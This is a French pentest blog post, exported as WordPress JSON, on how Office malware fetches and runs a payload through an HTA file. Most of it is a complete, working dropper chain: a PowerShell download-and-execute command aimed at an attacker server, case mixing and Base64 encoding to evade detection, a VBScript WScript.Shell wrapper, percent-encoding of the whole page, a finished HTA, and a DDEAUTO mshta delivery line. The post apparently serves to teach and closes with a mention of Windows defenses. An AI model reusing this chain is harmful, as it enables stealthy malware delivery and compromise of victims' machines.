{"id":376,"date":"2018-06-27T22:17:34","date_gmt":"2018-06-27T20:17:34","guid":{"rendered":"http:\/\/pentester.blog\/?p=376"},"modified":"2019-08-18T19:47:20","modified_gmt":"2019-08-18T17:47:20","slug":"recuperation-et-execution-dun-payload-via-un-fichier-hta","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=376","title":{"rendered":"R\u00e9cup\u00e9ration et ex\u00e9cution d’un malware via un fichier HTA"},"content":{"rendered":"

L’objet de cet article est de montrer une technique couramment utilis\u00e9e dans les malwares Microsoft Office (attaque DDE par exemple) pour t\u00e9l\u00e9charger et ex\u00e9cuter un malware via un fichier HTA.<\/p>\n

Mais au fait qu’est-ce qu’un fichier HTA ?<\/p>\n

Un fichier .HTA est un fichier \u00ab\u00a0HTML Application\u00a0\u00bb, une application ex\u00e9cut\u00e9e par le navigateur Web Internet Explorer. Le composant responsable de l’ex\u00e9cution des fichiers HTA est mshta.exe pr\u00e9sent dans Windows depuis la nuit des temps.<\/p>\n

Au d\u00e9part on a donc un script Powershell dont le but est de t\u00e9l\u00e9charger le malware puis de l’ex\u00e9cuter, rien de tr\u00e8s compliqu\u00e9.<\/p>\n

Ce qui est int\u00e9ressant ce sont les techniques d’obfuscation utilis\u00e9es pour passer au travers des radars.<\/p>\n

Prenons l’exemple suivant o\u00f9 le serveur de l’attaquant a pour adresse IP 192.168.1.32 et o\u00f9 le malware est un ex\u00e9cutable nomm\u00e9 ici msvss.exe. Notez au passage l’utilisation d’un mixte entre minuscule et majuscule, ce n’est pas pour le fun mais pour faire barrage \u00e0 du pattern-matching :<\/p>\n

powershell.exe -ExeCUtIonPolIcY bypass -noprofile -windowstyle minimized -command (New-Object System.Net.WebClient).DownloadFile(‘http:\/\/192.168.1.32\/msvss.exe’,’D:\\msvss.exe’); Start-Process(‘D:\\msvss.exe’)<\/strong><\/h5>\n

La premi\u00e8re chose \u00e0 faire est d’encoder la commande. Si on reprend cet exemple la commande \u00e0 encoder est celle-ci :<\/p>\n

(New-Object System.Net.WebClient).DownloadFile(‘http:\/\/192.168.1.32\/msvss.exe’,’D:\\msvss.exe’); Start-Process(‘D:\\msvss.exe’)<\/strong><\/h5>\n

Powershell g\u00e8rant nativement le d\u00e9codage Base64, il suffit de quelques lignes de code pour encoder cette commande en Base64 :<\/p>\n

$commands = \u00ab\u00a0(New-Object System.Net.WebClient).DownloadFile(‘http:\/\/192.168.1.21\/msvss.exe’,’D:\\msvss.exe’); Start-Process(‘D:\\msvss.exe’)\u00a0\u00bb <\/strong><\/h5>\n
$bytes = [System.Text.Encoding]::Unicode.GetBytes($commands) $encodedString = [Convert]::ToBase64String($bytes) <\/strong><\/h5>\n
echo $encodedString<\/strong><\/h5>\n

En sortie on obtient la longue chaine de caract\u00e8res suivante :<\/p>\n

KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADMAMgAvAG0AcwB2AHMAcwAuAGUAeABlACcALAAnAEQAOgBcAG0AcwB2AHMAcwAuAGUAeABlACcAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAoACcARAA6AFwAbQBzAHYAcwBzAC4AZQB4AGUAJwApAA==<\/strong><\/h5>\n

Il suffit de passer cette chaine de caract\u00e8re au param\u00e8tre\u00a0EncodedCommand de Powershell et le tour est jou\u00e9 :<\/p>\n

powershell.exe -ExeCUtIonPolIcY bypass -noprofile -windowstyle minimized -ENCodedcOMMANd KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADMAMgAvAG0AcwB2AHMAcwAuAGUAeABlACcALAAnAEQAOgBcAG0AcwB2AHMAcwAuAGUAeABlACcAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAoACcARAA6AFwAbQBzAHYAcwBzAC4AZQB4AGUAJwApAA==<\/strong><\/h5>\n

La commande powershell \u00e9tant encod\u00e9e, maintenant l’id\u00e9e est d’embarquer ce powershell dans un document HTML.<\/p>\n

Ce que l’on voit souvent, c’est l’utilisation d’un script VBScript car ce language permet la cr\u00e9ation d’objets, dont Powershell…<\/p>\n

On obtient donc ceci :<\/p>\n

<!DOCTYPE html><\/strong>
\n<meta http-equiv=\u00a0\u00bbx-ua-compatible\u00a0\u00bb content=\u00a0\u00bbie=emulateie8″ ><\/strong>
\n<html><\/strong>
\n<body><\/strong>
\n<script language=\u00a0\u00bbvbscript\u00a0\u00bb><\/strong>
\nDim KHALON81<\/strong>
\nDim kkk<\/strong>
\nSeT KHALON81 = createobject ( \u00ab\u00a0wscrIPt.sHELl\u00a0\u00bb )<\/strong>
\nkkk = \u00ab\u00a0powershell.exe -ExeCUtIonPolIcY bypass -noprofile -windowstyle minimized -ENCodedcOMMANd KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADMAMgAvAG0AcwB2AHMAcwAuAGUAeABlACcALAAnAEQAOgBcAG0AcwB2AHMAcwAuAGUAeABlACcAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAoACcARAA6AFwAbQBzAHYAcwBzAC4AZQB4AGUAJwApAA==\u00a0\u00bb<\/strong>
\nKHALON81.RUN(kkk) <\/strong>
\nSEt KHALON81 = NOTHInG<\/strong>
\n<\/script><\/strong>
\n<\/body><\/strong>
\n<\/html><\/strong><\/h5>\n

C’est pas mal mais on voit qu’il y a du Powershell.<\/p>\n

Continuons l’obfuscation en utilisant la technique du \u00ab\u00a0Percent Encoding\u00a0\u00bb sur l’int\u00e9gralit\u00e9 du code HTML. Attention, de base le \u00ab\u00a0Percent Encoding\u00a0\u00bb n’encode pas les caract\u00e8res ASCII classiques, les \u00a0\u00bb Unreserved Characters\u00a0\u00bb ce qui implique qu’une partie du code restera non obfusqu\u00e9e comme les mots-clefs \u00ab\u00a0script\u00a0\u00bb, \u00ab\u00a0powershell\u00a0\u00bb, ce qui est facheux.<\/p>\n

Il nous faut donc un outil de \u00ab\u00a0Percent Encoding\u00a0\u00bb capable d’encoder tous les caract\u00e8res, c’est le cas de cet outil en ligne :<\/p>\n

http:\/\/2tap.com\/javascript-percent-encoder\/<\/p>\n

On copie colle tout le code HTML pr\u00e9c\u00e9dent et obtient en sortie le code suivant :<\/p>\n

%3c%21%44%4f%43%54%59%50%45%20%68%74%6d%6c%3e%20%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%78%2d%75%61%2d%63%6f%6d%70%61%74%69%62%6c%65%22%20%63%6f%6e%74%65%6e%74%3d%22%69%65%3d%65%6d%75%6c%61%74%65%69%65%38%22%20%3e%20%3c%68%74%6d%6c%3e%20%3c%62%6f%64%79%3e%20%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%76%62%73%63%72%69%70%74%22%3e%20%44%69%6d%20%4b%48%41%4c%4f%4e%38%31%20%44%69%6d%20%6b%6b%6b%20%53%65%54%20%4b%48%41%4c%4f%4e%38%31%20%3d%20%63%72%65%61%74%65%6f%62%6a%65%63%74%20%28%20%22%77%73%63%72%49%50%74%2e%73%48%45%4c%6c%22%20%29%20%6b%6b%6b%20%3d%20%22%70%6f%77%65%72%73%68%65%6c%6c%2e%65%78%65%20%2d%45%78%65%43%55%74%49%6f%6e%50%6f%6c%49%63%59%20%62%79%70%61%73%73%20%2d%6e%6f%70%72%6f%66%69%6c%65%20%2d%77%69%6e%64%6f%77%73%74%79%6c%65%20%6d%69%6e%69%6d%69%7a%65%64%20%2d%45%4e%43%6f%64%65%64%63%4f%4d%4d%41%4e%64%20%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%63%41%5a%51%42%69%41%45%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%6b%41%4c%67%42%45%41%47%38%41%64%77%42%75%41%47%77%41%62%77%42%68%41%47%51%41%52%67%42%70%41%47%77%41%5a%51%41%6f%41%43%63%41%61%41%42%30%41%48%51%41%63%41%41%36%41%43%38%41%4c%77%41%78%41%44%6b%41%4d%67%41%75%41%44%45%41%4e%67%41%34%41%43%34%41%4d%51%41%75%41%44%4d%41%4d%67%41%76%41%47%30%41%63%77%42%32%41%48%4d%41%63%77%41%75%41%47%55%41%65%41%42%6c%41%43%63%41%4c%41%41%6e%41%45%51%41%4f%67%42%63%41%47%30%41%63%77%42%32%41%48%4d%41%63%77%41%75%41%47%55%41%65%41%42%6c%41%43%63%41%4b%51%41%37%41%43%41%41%55%77%42%30%41%47%45%41%63%67%42%30%41%43%30%41%55%41%42%79%41%47%38%41%59%77%42%6c%41%48%4d%41%63%77%41%6f%41%43%63%41%52%41%41%36%41%46%77%41%62%51%42%7a%41%48%59%41%63%77%42%7a%41%43%34%41%5a%51%42%34%41%47%55%41%4a%77%41%70%41%41%3d%3d%22%20%4b%48%41%4c%4f%4e%38%31%2e%52%55%4e%28%6b%6b%6b%29%20%20%53%45%74%20%4b%48%41%4c%4f%4e%38%31%20%3d%20%4e%4f%54%48%49%6e%47%20%3c%2f%73%63%72%69%70%74%3e%20%3c%2f%62%6f%64%79%3e%20%3c%2f%68%74%6d%6c%3e<\/strong><\/h5>\n

L\u00e0 c’est pas mal, on arrive \u00e0 l’\u00e9tape finale, la cr\u00e9ation du fichier HTA.<\/p>\n

Ce fichier HTA est simplement du code HTML contenant un script Javascript se chargeant de faire l’op\u00e9ration inverse, le d\u00e9codage, le \u00ab\u00a0unescape\u00a0\u00bb :<\/p>\n

<!DOCTYPE html><\/strong>
\n<meta http-equiv=\u00a0\u00bbx-ua-compatible\u00a0\u00bb content=\u00a0\u00bbie=emulateie8″ ><\/strong>
\n<html><\/strong>
\n<body><\/strong>
\n<script language=\u00a0\u00bbjavascript\u00a0\u00bb><\/strong>
\n<!–<\/strong>
\ndocument.write(unescape(‘%3c%21%44%4f%43%54%59%50%45%20%68%74%6d%6c%3e%20%3c%6d%65%74%61%20%68%74%74%70%2d%65%71%75%69%76%3d%22%78%2d%75%61%2d%63%6f%6d%70%61%74%69%62%6c%65%22%20%63%6f%6e%74%65%6e%74%3d%22%69%65%3d%65%6d%75%6c%61%74%65%69%65%38%22%20%3e%20%3c%68%74%6d%6c%3e%20%3c%62%6f%64%79%3e%20%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%76%62%73%63%72%69%70%74%22%3e%20%44%69%6d%20%4b%48%41%4c%4f%4e%38%31%20%44%69%6d%20%6b%6b%6b%20%53%65%54%20%4b%48%41%4c%4f%4e%38%31%20%3d%20%63%72%65%61%74%65%6f%62%6a%65%63%74%20%28%20%22%77%73%63%72%49%50%74%2e%73%48%45%4c%6c%22%20%29%20%6b%6b%6b%20%3d%20%22%70%6f%77%65%72%73%68%65%6c%6c%2e%65%78%65%20%2d%45%78%65%43%55%74%49%6f%6e%50%6f%6c%49%63%59%20%62%79%70%61%73%73%20%2d%6e%6f%70%72%6f%66%69%6c%65%20%2d%77%69%6e%64%6f%77%73%74%79%6c%65%20%6d%69%6e%69%6d%69%7a%65%64%20%2d%45%4e%43%6f%64%65%64%63%4f%4d%4d%41%4e%64%20%4b%41%42%4f%41%47%55%41%64%77%41%74%41%45%38%41%59%67%42%71%41%47%55%41%59%77%42%30%41%43%41%41%55%77%42%35%41%48%4d%41%64%41%42%6c%41%47%30%41%4c%67%42%4f%41%47%55%41%64%41%41%75%41%46%63%41%5a%51%42%69%41%45%4d%41%62%41%42%70%41%47%55%41%62%67%42%30%41%43%6b%41%4c%67%42%45%41%47%38%41%64%77%42%75%41%47%77%41%62%77%42%68%41%47%51%41%52%67%42%70%41%47%77%41%5a%51%41%6f%41%43%63%41%61%41%42%30%41%48%51%41%63%41%41%36%41%43%38%41%4c%77%41%78%41%44%6b%41%4d%67%41%75%41%44%45%41%4e%67%41%34%41%43%34%41%4d%51%41%75%41%44%4d%41%4d%67%41%76%41%47%30%41%63%77%42%32%41%48%4d%41%63%77%41%75%41%47%55%41%65%41%42%6c%41%43%63%41%4c%41%41%6e%41%45%51%41%4f%67%42%63%41%47%30%41%63%77%42%32%41%48%4d%41%63%77%41%75%41%47%55%41%65%41%42%6c%41%43%63%41%4b%51%41%37%41%43%41%41%55%77%42%30%41%47%45%41%63%67%42%30%41%43%30%41%55%41%42%79%41%47%38%41%59%77%42%6c%41%48%4d%41%63%77%41%6f%41%43%63%41%52%41%41%36%41%46%77%41%62%51%42%7a%41%48%59%41%63%77%42%7a%41%43%34%41%5a%51%42%34%41%47%55%41%4a%77%41%70%41%41%3d%3d%22%20%4b%48%41%4c%4f%4e%38%31%2e%52%55%4e%28%6b%6b%6b%29%20%20%53%45%74%20%4b%48%41%4c%4f%4e%38%31%20%3d%20%4e%4f%54%48%49%6e%47%20%3c%2f%73%63%72%69%70%74%3e%20%3c%2f%62%6f%64%79%3e%20%3c%2f%68%74%6d%6c%3e’));<\/strong>
\n\/\/–><\/strong>
\n<\/script><\/strong>
\n<\/body><\/strong>
\n<\/html><\/strong><\/h5>\n

Voila c’est termin\u00e9, il n’y a plus qu’\u00e0 l’enregistrer dans fichier au format .hta, par exemple un index.hta.<\/span><\/p>\n

Vous imaginez la suite, ce fichier est envoy\u00e9 dans des pi\u00e8ces jointes ou appel\u00e9 dans fichier Word via une commande\u00a0DDE du style {DDEAUTO c:\\\\windows\\\\system<\/code>32<\/code>\\\\mshta.exe ...}<\/code><\/p>\n

A noter que ces attaques via DDE et autres sur Microsoft Office sont d\u00e9tect\u00e9es et bloqu\u00e9es sous Windows 10 gr\u00e2ce \u00e0 la fonctionnalit\u00e9 ASR (Attack Surface Redution) qui emp\u00eache la cr\u00e9ation de processus enfant.<\/p>\n","protected":false},"excerpt":{"rendered":"

L’objet de cet article est de montrer une technique couramment utilis\u00e9e dans les malwares Microsoft Office (attaque DDE par exemple) pour t\u00e9l\u00e9charger et ex\u00e9cuter un malware via un fichier HTA. Mais au fait qu’est-ce qu’un fichier HTA ? Un fichier .HTA est un fichier \u00ab\u00a0HTML Application\u00a0\u00bb, une application ex\u00e9cut\u00e9e par le navigateur Web Internet Explorer. … Continuer la lecture de R\u00e9cup\u00e9ration et ex\u00e9cution d’un malware via un fichier HTA<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-376","post","type-post","status-publish","format-standard","hentry","category-malware"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/376","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=376"}],"version-history":[{"count":18,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/376\/revisions"}],"predecessor-version":[{"id":396,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/376\/revisions\/396"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=376"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=376"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=376"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}